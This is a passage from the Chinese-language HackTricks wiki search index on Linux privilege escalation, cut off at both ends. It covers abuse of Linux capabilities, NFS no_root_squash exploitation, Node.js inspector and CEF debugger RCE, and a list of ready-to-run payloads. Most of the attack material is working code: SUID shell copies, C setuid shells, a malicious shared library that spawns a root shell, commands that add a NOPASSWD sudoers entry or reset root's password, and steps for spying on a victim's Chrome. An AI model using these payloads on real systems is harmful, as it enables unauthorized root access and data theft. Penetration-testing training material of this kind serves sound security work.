FS_APPEND_FL = 0x00000020\\nFS_IOC_SETFLAGS = 0x40086602 fd = os.open(\'/path/to/file.sh\', os.O_RDONLY)\\nf = struct.pack(\'i\', FS_APPEND_FL)\\nfcntl.ioctl(fd, FS_IOC_SETFLAGS, f) f=open(\\"/path/to/file.sh\\",\'a+\')\\nf.write(\'New content for the file\\\\n\') tip 注意,通常这个不可变属性是通过以下命令设置和移除的: sudo chattr +i file.txt\\nsudo chattr -i file.txt","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_LINUX_IMMUTABLE","id":"1861","title":"CAP_LINUX_IMMUTABLE"},"1862":{"body":"CAP_SYS_CHROOT 使得可以执行 chroot(2) 系统调用,这可能允许通过已知漏洞逃离 chroot(2) 环境: 如何从各种 chroot 解决方案中突破 chw00t: chroot 逃逸工具","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_CHROOT","id":"1862","title":"CAP_SYS_CHROOT"},"1863":{"body":"CAP_SYS_BOOT 不仅允许执行 reboot(2) 系统调用以重启系统,包括针对特定硬件平台的特定命令,如 LINUX_REBOOT_CMD_RESTART2,还允许使用 kexec_load(2),并且从 Linux 3.17 开始,允许使用 kexec_file_load(2) 来加载新的或签名的崩溃内核。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYS_BOOT","id":"1863","title":"CAP_SYS_BOOT"},"1864":{"body":"CAP_SYSLOG 在 Linux 2.6.37 中从更广泛的 CAP_SYS_ADMIN 中分离,特别授予使用 syslog(2) 调用的能力。此能力使得在 kptr_restrict 设置为 1 时,可以通过 /proc 和类似接口查看内核地址,该设置控制内核地址的暴露。自 Linux 2.6.39 起,kptr_restrict 的默认值为 0,这意味着内核地址被暴露,尽管许多发行版出于安全原因将其设置为 1(隐藏地址,除非来自 uid 0)或 2(始终隐藏地址)。 此外, CAP_SYSLOG 允许在 dmesg_restrict 设置为 1 时访问 dmesg 输出。尽管这些变化, CAP_SYS_ADMIN 仍然保留执行 syslog 操作的能力,因其历史原因。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SYSLOG","id":"1864","title":"CAP_SYSLOG"},"1865":{"body":"CAP_MKNOD 扩展了 mknod 系统调用的功能,不仅限于创建常规文件、FIFO(命名管道)或 UNIX 域套接字。它特别允许创建特殊文件,包括: S_IFCHR :字符特殊文件,如终端设备。 S_IFBLK :块特殊文件,如磁盘设备。 此能力对于需要创建设备文件的进程至关重要,便于通过字符或块设备直接与硬件交互。 这是一个默认的 docker 能力 ( https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19 )。 此能力允许在主机上进行特权提升(通过完全磁盘读取),在以下条件下: 拥有对主机的初始访问(无特权)。 拥有对容器的初始访问(特权(EUID 0),并有效的 CAP_MKNOD)。 主机和容器应共享相同的用户命名空间。 在容器中创建和访问块设备的步骤: 在主机上作为标准用户: 使用 id 确定当前用户 ID,例如 uid=1000(standarduser)。 确定目标设备,例如 /dev/sdb。 在容器内作为 root: bash # Create a block special file for the host device\\nmknod /dev/sdb b 8 16\\n# Set read and write permissions for the user and group\\nchmod 660 /dev/sdb\\n# Add the corresponding standard user present on the host\\nuseradd -u 1000 standarduser\\n# Switch to the newly created user\\nsu standarduser 回到主机: bash # Locate the PID of the container process owned by \\"standarduser\\"\\n# This is an illustrative example; actual command might vary\\nps aux | grep -i container_name | grep -i standarduser\\n# Assuming the found PID is 12345\\n# Access the container\'s filesystem and the special block device\\nhead /proc/12345/root/dev/sdb 这种方法允许标准用户通过容器访问并可能读取来自 /dev/sdb 的数据,利用共享的用户命名空间和设备上设置的权限。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_MKNOD","id":"1865","title":"CAP_MKNOD"},"1866":{"body":"CAP_SETPCAP 使进程能够 更改另一个进程的能力集 ,允许从有效、可继承和允许的集合中添加或删除能力。然而,进程只能修改其自身允许集中的能力,确保它无法将另一个进程的权限提升到超出自身的范围。最近的内核更新收紧了这些规则,限制 CAP_SETPCAP 只能减少其自身或其后代的允许集中的能力,以降低安全风险。使用此功能需要在有效集中拥有 CAP_SETPCAP,并在允许集中拥有目标能力,利用 capset() 进行修改。这总结了 CAP_SETPCAP 的核心功能和限制,突出了其在权限管理和安全增强中的作用。 CAP_SETPCAP 是一种 Linux 能力,允许进程 修改另一个进程的能力集 。它授予从其他进程的有效、可继承和允许能力集中添加或删除能力的能力。然而,对如何使用此能力有某些限制。 具有 CAP_SETPCAP 的进程 只能授予或删除其自身允许能力集中存在的能力 。换句话说,如果进程自身没有某个能力,则无法将该能力授予另一个进程。这一限制防止了进程将另一个进程的权限提升到超出自身的权限级别。 此外,在最近的内核版本中,CAP_SETPCAP 能力已被 进一步限制 。它不再允许进程任意修改其他进程的能力集。相反,它 仅允许进程降低其自身允许能力集或其后代的允许能力集中的能力 。这一变化旨在减少与能力相关的潜在安全风险。 要有效使用 CAP_SETPCAP,您需要在有效能力集中拥有该能力,并在允许能力集中拥有目标能力。然后,您可以使用 capset() 系统调用来修改其他进程的能力集。 总之,CAP_SETPCAP 允许进程修改其他进程的能力集,但不能授予自身没有的能力。此外,由于安全问题,其功能在最近的内核版本中已被限制,仅允许减少其自身允许能力集或其后代的允许能力集中的能力。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » CAP_SETPCAP","id":"1866","title":"CAP_SETPCAP"},"1867":{"body":"这些示例大多来自 https://attackdefense.pentesteracademy.com/ ,因此如果您想练习这些权限提升技术,我推荐这些实验室。 其他参考文献 : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/#:~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20. https://linux-audit.com/linux-capabilities-101/ https://www.linuxjournal.com/article/5737 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot ​ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Linux Capabilities » 参考文献","id":"1867","title":"参考文献"},"1868":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » NFS No Root Squash Misconfiguration Privilege Escalation","id":"1868","title":"NFS No Root Squash Misconfiguration Privilege Escalation"},"1869":{"body":"NFS 通常(特别是在 Linux 中)会信任连接的客户端所指示的 uid 和 gid 来访问文件(如果没有使用 kerberos)。然而,服务器上可以设置一些配置来 改变这种行为 : all_squash :它会将所有访问映射到**nobody**(65534 无符号 / -2 有符号)。因此,所有人都是 nobody,没有用户被使用。 root_squash/no_all_squash :这是 Linux 的默认设置, 仅对 uid 0(root)进行压缩 。因此,任何 UID 和 GID 都被信任,但 0 被压缩为 nobody(因此无法进行 root 冒充)。 no_root_squash :如果启用此配置,甚至不会压缩 root 用户。这意味着如果你以此配置挂载一个目录,你可以作为 root 访问它。 在 /etc/exports 文件中,如果你发现某个目录被配置为 no_root_squash ,那么你可以 作为客户端访问 它,并 像本地机器的 root 一样在该目录中写入 。 有关 NFS 的更多信息,请查看: 2049 - Pentesting NFS Service","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Squashing Basic Info","id":"1869","title":"Squashing Basic Info"},"187":{"body":"在所有面向用户的端口上禁用DTP:switchport mode access + switchport nonegotiate。 将每个干线的本地VLAN更改为 未使用的黑洞VLAN 并标记:vlan dot1q tag native。 在干线上修剪不必要的VLAN:switchport trunk allowed vlan 10,20。 强制实施端口安全、DHCP嗅探、动态ARP检查 和802.1X 以限制恶意的二层活动。 如果不需要IP电话欺骗,请禁用LLDP-MED自动语音策略(或将其锁定到经过身份验证的MAC OUI)。 优先使用私有VLAN或L3分段,而不是仅依赖802.1Q分离。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 防御建议","id":"187","title":"防御建议"},"1870":{"body":"","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Privilege Escalation","id":"1870","title":"Privilege Escalation"},"1871":{"body":"选项 1 使用 bash: 在客户端机器上挂载该目录 ,并 作为 root 复制 /bin/bash 二进制文件到挂载文件夹中,并赋予其 SUID 权限,然后 从受害者 机器执行该 bash 二进制文件。 请注意,要在 NFS 共享中成为 root, no_root_squash 必须在服务器上配置。 然而,如果未启用,你可以通过将二进制文件复制到 NFS 共享并以你想要提升的用户身份赋予 SUID 权限来提升到其他用户。 bash #Attacker, as root user\\nmkdir /tmp/pe\\nmount -t nfs : /tmp/pe\\ncd /tmp/pe\\ncp /bin/bash .\\nchmod +s bash #Victim\\ncd \\n./bash -p #ROOT shell 选项 2 使用 C 编译代码: 在客户端机器上挂载该目录 ,并 以 root 身份复制 我们的编译有效载荷到挂载文件夹中,该有效载荷将滥用 SUID 权限,赋予其 SUID 权限,并 从受害者 机器执行该二进制文件(您可以在这里找到一些 C SUID 有效载荷 )。 与之前相同的限制 bash #Attacker, as root user\\ngcc payload.c -o payload\\nmkdir /tmp/pe\\nmount -t nfs : /tmp/pe\\ncd /tmp/pe\\ncp /tmp/payload .\\nchmod +s payload #Victim\\ncd \\n./payload #ROOT shell","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Remote Exploit","id":"1871","title":"Remote Exploit"},"1872":{"body":"tip 注意,如果您可以从您的机器创建一个 到受害者机器的隧道,您仍然可以使用远程版本来利用此特权提升,隧道所需的端口 。 以下技巧适用于文件/etc/exports 指示一个IP 的情况。在这种情况下,您 将无法使用 任何情况下的 远程利用 ,您需要 利用这个技巧 。 另一个使利用能够工作的必要条件是**/etc/export中的导出** 必须使用insecure标志 。 -- 我不确定如果/etc/export指示一个IP地址,这个技巧是否有效 --","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Local Exploit","id":"1872","title":"Local Exploit"},"1873":{"body":"该场景涉及利用本地机器上挂载的NFS共享,利用NFSv3规范中的一个缺陷,该缺陷允许客户端指定其uid/gid,从而可能实现未经授权的访问。利用涉及使用 libnfs ,这是一个允许伪造NFS RPC调用的库。 Compiling the Library 库的编译步骤可能需要根据内核版本进行调整。在这种特定情况下,fallocate系统调用被注释掉。编译过程涉及以下命令: bash ./bootstrap\\n./configure\\nmake\\ngcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ 进行利用 利用涉及创建一个简单的 C 程序 (pwn.c),该程序提升权限到 root,然后执行一个 shell。程序被编译,生成的二进制文件 (a.out) 被放置在具有 suid root 的共享上,使用 ld_nfs.so 在 RPC 调用中伪造 uid: 编译利用代码: bash cat pwn.c\\nint main(void){setreuid(0,0); system(\\"/bin/bash\\"); return 0;}\\ngcc pwn.c -o a.out 将漏洞放置在共享上并通过伪造 uid 修改其权限: bash LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out\\nLD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out 执行漏洞利用以获得根权限: bash /mnt/share/a.out\\n#root","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Basic Information","id":"1873","title":"Basic Information"},"1874":{"body":"一旦获得 root 访问权限,为了在不更改所有权的情况下与 NFS 共享进行交互(以避免留下痕迹),使用一个 Python 脚本(nfsh.py)。该脚本调整 uid 以匹配正在访问的文件,从而允许在共享上与文件进行交互,而不会出现权限问题: python #!/usr/bin/env python\\n# script from https://www.errno.fr/nfs_privesc.html\\nimport sys\\nimport os def get_file_uid(filepath):\\ntry:\\nuid = os.stat(filepath).st_uid\\nexcept OSError as e:\\nreturn get_file_uid(os.path.dirname(filepath))\\nreturn uid filepath = sys.argv[-1]\\nuid = get_file_uid(filepath)\\nos.setreuid(uid, uid)\\nos.system(\' \'.join(sys.argv[1:])) 像这样运行: bash # ll ./mount/\\ndrwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » NFS no_root_squash/no_all_squash misconfiguration PE » Bonus: NFShell for Stealthy File Access","id":"1874","title":"Bonus: NFShell for Stealthy File Access"},"1875":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Node inspector/CEF debug abuse","id":"1875","title":"Node inspector/CEF debug abuse"},"1876":{"body":"来自文档 :当使用 --inspect 开关启动时,Node.js 进程会监听调试客户端。 默认情况下 ,它将在主机和端口 127.0.0.1:9229 上监听。每个进程还会分配一个 唯一 的 UUID 。 调试客户端必须知道并指定主机地址、端口和 UUID 以进行连接。完整的 URL 看起来像 ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e。 warning 由于 调试器对 Node.js 执行环境具有完全访问权限 ,能够连接到此端口的恶意行为者可能能够代表 Node.js 进程执行任意代码( 潜在的权限提升 )。 启动调试器有几种方法: bash node --inspect app.js #Will run the inspector in port 9229\\nnode --inspect=4444 app.js #Will run the inspector in port 4444\\nnode --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444\\nnode --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444\\n# --inspect-brk is equivalent to --inspect node --inspect --inspect-port=0 app.js #Will run the inspector in a random port\\n# Note that using \\"--inspect-port\\" without \\"--inspect\\" or \\"--inspect-brk\\" won\'t run the inspector 当你启动一个被检查的进程时,类似这样的内容将会出现: Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d\\nFor help, see: https://nodejs.org/en/docs/inspector 基于 CEF ( Chromium Embedded Framework ) 的进程需要使用参数: --remote-debugging-port=9222 来打开 debugger (SSRF 保护仍然非常相似)。然而,它们 而不是 授予 NodeJS debug 会话,而是通过 Chrome DevTools Protocol 与浏览器进行通信,这是一个控制浏览器的接口,但没有直接的 RCE。 当你启动一个调试的浏览器时,类似这样的内容将会出现: DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 基本信息","id":"1876","title":"基本信息"},"1877":{"body":"在网页浏览器中打开的网站可以在浏览器安全模型下进行 WebSocket 和 HTTP 请求。 初始 HTTP 连接 是 获取唯一调试器会话 ID 所必需的。 同源政策****防止 网站能够进行 此 HTTP 连接 。为了防止 DNS 重新绑定攻击 , Node.js 验证连接的**\'Host\' 头 是否精确指定了 IP 地址 或 localhost 或 localhost6**。 note 该 安全措施防止利用检查器 通过 仅发送 HTTP 请求 (这可以通过利用 SSRF 漏洞来完成)来运行代码。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 浏览器、WebSockets 和同源政策","id":"1877","title":"浏览器、WebSockets 和同源政策"},"1878":{"body":"您可以向正在运行的 nodejs 进程发送 信号 SIGUSR1 以使其在默认端口 启动检查器 。但是,请注意,您需要拥有足够的权限,因此这可能会授予您 对进程内部信息的特权访问 ,但不会直接提升权限。 bash kill -s SIGUSR1 \\n# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d note 这在容器中很有用,因为 关闭进程并启动一个新进程 使用 --inspect 不是一个选项 ,因为 容器 将与进程一起 被终止 。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 在运行的进程中启动检查器","id":"1878","title":"在运行的进程中启动检查器"},"1879":{"body":"要连接到 基于Chromium的浏览器 ,可以访问 Chrome 或 Edge 的 chrome://inspect 或 edge://inspect URL。通过点击配置按钮,应该确保 目标主机和端口 正确列出。图像显示了一个远程代码执行 (RCE) 示例: 使用 命令行 ,您可以通过以下方式连接到调试器/检查器: bash node inspect :\\nnode inspect 127.0.0.1:9229\\n# RCE example from debug console\\ndebug> exec(\\"process.mainModule.require(\'child_process\').exec(\'/Applications/iTerm.app/Contents/MacOS/iTerm2\')\\") 该工具 https://github.com/taviso/cefdebug 允许 查找 本地运行的检查器并 注入代码 。 bash #List possible vulnerable sockets\\n./cefdebug.exe\\n#Check if possibly vulnerable\\n./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \\"process.version\\"\\n#Exploit it\\n./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \\"process.mainModule.require(\'child_process\').exec(\'calc\')\\" note 请注意,如果通过 Chrome DevTools Protocol 连接到浏览器, NodeJS RCE 漏洞将无法工作 (您需要检查 API 以找到有趣的操作)。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 连接到检查器/调试器","id":"1879","title":"连接到检查器/调试器"},"188":{"body":"即使是完美加固的交换机配置也可能被固件错误破坏。最近的例子包括: CVE-2022-20728† – Cisco Aironet/Catalyst接入点 允许从本地VLAN注入到非本地WLAN VLAN,绕过有线/无线分段。 **CVE-2024-20465 (Cisco IOS工业Ethernet)**允许在切换弹性以太网协议后在SVI上绕过ACL,泄漏VRF/VLAN之间的流量。补丁17.9.5或更高版本。 始终监控供应商关于VLAN相关绕过/ACL问题的建议,并保持基础设施映像的最新。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 现实世界的供应商漏洞(2022-2024)","id":"188","title":"现实世界的供应商漏洞(2022-2024)"},"1880":{"body":"note 如果您来这里是想了解如何从 Electron 中的 XSS 获取 RCE,请查看此页面。 一些常见的方法来获取 RCE 当您可以 连接 到 Node 检查器 时是使用类似的东西(看起来这 在连接到 Chrome DevTools 协议时不会工作 ): javascript process.mainModule.require(\\"child_process\\").exec(\\"calc\\")\\nwindow.appshell.app.openURLInDefaultBrowser(\\"c:/windows/system32/calc.exe\\")\\nrequire(\\"child_process\\").spawnSync(\\"calc.exe\\")\\nBrowser.open(JSON.stringify({ url: \\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\calc.exe\\" }))","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » NodeJS 调试器/检查器中的 RCE","id":"1880","title":"NodeJS 调试器/检查器中的 RCE"},"1881":{"body":"您可以在这里查看 API: https://chromedevtools.github.io/devtools-protocol/ 在本节中,我将列出我发现人们用来利用此协议的有趣内容。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Chrome DevTools Protocol Payloads","id":"1881","title":"Chrome DevTools Protocol Payloads"},"1882":{"body":"在 CVE-2021-38112 中,Rhino 安全发现基于 CEF 的应用程序 在系统中注册了一个自定义 URI (workspaces://index.html),该 URI 接收完整的 URI,然后 使用部分构造的配置启动 CEF 基于的应用程序 。 发现 URI 参数被 URL 解码并用于启动 CEF 基本应用程序,允许用户 注入 标志 --gpu-launcher 到 命令行 并执行任意操作。 因此,像这样的有效载荷: workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE 将执行 calc.exe。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 通过深层链接进行参数注入","id":"1882","title":"通过深层链接进行参数注入"},"1883":{"body":"更改 下载文件将要保存的文件夹 ,并下载一个文件以 覆盖 应用程序中常用的 源代码 ,用你的 恶意代码 替换。 javascript ws = new WebSocket(url) //URL of the chrome devtools service\\nws.send(\\nJSON.stringify({\\nid: 42069,\\nmethod: \\"Browser.setDownloadBehavior\\",\\nparams: {\\nbehavior: \\"allow\\",\\ndownloadPath: \\"/code/\\",\\n},\\n})\\n)","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 覆盖文件","id":"1883","title":"覆盖文件"},"1884":{"body":"根据这篇文章: https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148 ,可以获得 RCE 并从 theriver 中外泄内部页面。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » Webdriver RCE 和外泄","id":"1884","title":"Webdriver RCE 和外泄"},"1885":{"body":"在真实环境中, 在攻陷 使用 Chrome/Chromium 浏览器的用户 PC 后,您可以启动一个 Chrome 进程, 激活调试并转发调试端口 ,以便您可以访问它。这样,您将能够 检查受害者在 Chrome 中所做的一切并窃取敏感信息 。 隐秘的方法是 终止每个 Chrome 进程 ,然后调用类似于 bash Start-Process \\"Chrome\\" \\"--remote-debugging-port=9222 --restore-last-session\\"","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 后期利用","id":"1885","title":"后期利用"},"1886":{"body":"https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s https://github.com/taviso/cefdebug https://iwantmore.pizza/posts/cve-2019-1414.html https://bugs.chromium.org/p/project-zero/issues/detail?id=773 https://bugs.chromium.org/p/project-zero/issues/detail?id=1742 https://bugs.chromium.org/p/project-zero/issues/detail?id=1944 https://nodejs.org/en/docs/guides/debugging-getting-started/ https://chromedevtools.github.io/devtools-protocol/ https://larry.science/post/corctf-2021/#saasme-2-solves https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Node inspector/CEF debug abuse » 参考文献","id":"1886","title":"参考文献"},"1887":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 执行的有效载荷","id":"1887","title":"执行的有效载荷"},"1888":{"body":"bash cp /bin/bash /tmp/b && chmod +s /tmp/b\\n/bin/b -p #Maintains root privileges from suid, working in debian & buntu","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » Bash","id":"1888","title":"Bash"},"1889":{"body":"c //gcc payload.c -o payload\\nint main(void){\\nsetresuid(0, 0, 0); //Set as user suid user\\nsystem(\\"/bin/sh\\");\\nreturn 0;\\n} c //gcc payload.c -o payload\\n#include \\n#include \\n#include int main(){\\nsetuid(getuid());\\nsystem(\\"/bin/bash\\");\\nreturn 0;\\n} c // Privesc to user id: 1000\\n#define _GNU_SOURCE\\n#include \\n#include int main(void) {\\nchar *const paramList[10] = {\\"/bin/bash\\", \\"-p\\", NULL};\\nconst int id = 1000;\\nsetresuid(id, id, id);\\nexecve(paramList[0], paramList, NULL);\\nreturn 0;\\n}","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » C","id":"1889","title":"C"},"189":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 VLANPWN攻击工具包 – https://github.com/casterbytethrowback/VLANPWN Twingate “什么是VLAN跳跃?”(2024年8月) – https://www.twingate.com/blog/glossary/vlan%20hopping VoIP Hopper项目 – https://github.com/hmgh0st/voiphopper Cisco建议 “cisco-sa-apvlan-TDTtb4FY” – https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Lateral VLAN Segmentation Bypass » 参考文献","id":"189","title":"参考文献"},"1890":{"body":"","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 通过覆盖文件来提升权限","id":"1890","title":"通过覆盖文件来提升权限"},"1891":{"body":"在 /etc/passwd 中添加带密码的用户 在 /etc/shadow 中更改密码 在 /etc/sudoers 中将用户添加到 sudoers 通过 docker socket 滥用 docker,通常在 /run/docker.sock 或 /var/run/docker.sock 中","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 常见文件","id":"1891","title":"常见文件"},"1892":{"body":"检查某个二进制文件使用的库,在这种情况下是 /bin/su: bash ldd /bin/su\\nlinux-vdso.so.1 (0x00007ffef06e9000)\\nlibpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)\\nlibpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)\\nlibaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)\\nlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)\\nlibdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)\\nlibcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)\\n/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) 在这种情况下,让我们尝试伪装 /lib/x86_64-linux-gnu/libaudit.so.1。 因此,检查 su 二进制文件使用的此库的函数: bash objdump -T /bin/su | grep audit\\n0000000000000000 DF *UND* 0000000000000000 audit_open\\n0000000000000000 DF *UND* 0000000000000000 audit_log_user_message\\n0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message\\n000000000020e968 g DO .bss 0000000000000004 Base audit_fd 符号 audit_open、audit_log_acct_message、audit_log_acct_message 和 audit_fd 可能来自 libaudit.so.1 库。由于 libaudit.so.1 将被恶意共享库覆盖,因此这些符号应该出现在新的共享库中,否则程序将无法找到该符号并将退出。 c #include\\n#include\\n#include //gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c int audit_open;\\nint audit_log_acct_message;\\nint audit_log_user_message;\\nint audit_fd; void inject()__attribute__((constructor)); void inject()\\n{\\nsetuid(0);\\nsetgid(0);\\nsystem(\\"/bin/bash\\");\\n} 现在,只需调用 /bin/su ,您将获得一个以 root 身份运行的 shell。","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 覆盖库","id":"1892","title":"覆盖库"},"1893":{"body":"您能让 root 执行某些操作吗?","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 脚本","id":"1893","title":"脚本"},"1894":{"body":"bash echo \'chmod 777 /etc/sudoers && echo \\"www-data ALL=NOPASSWD:ALL\\" >> /etc/sudoers && chmod 440 /etc/sudoers\' > /tmp/update","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » www-data 到 sudoers","id":"1894","title":"www-data 到 sudoers"},"1895":{"body":"bash echo \\"root:hacked\\" | chpasswd","breadcrumbs":"Linux Privilege Escalation » Payloads to execute » 更改根密码","id":"1895","title":"更改根密码"},"1896":{"body":"bash echo 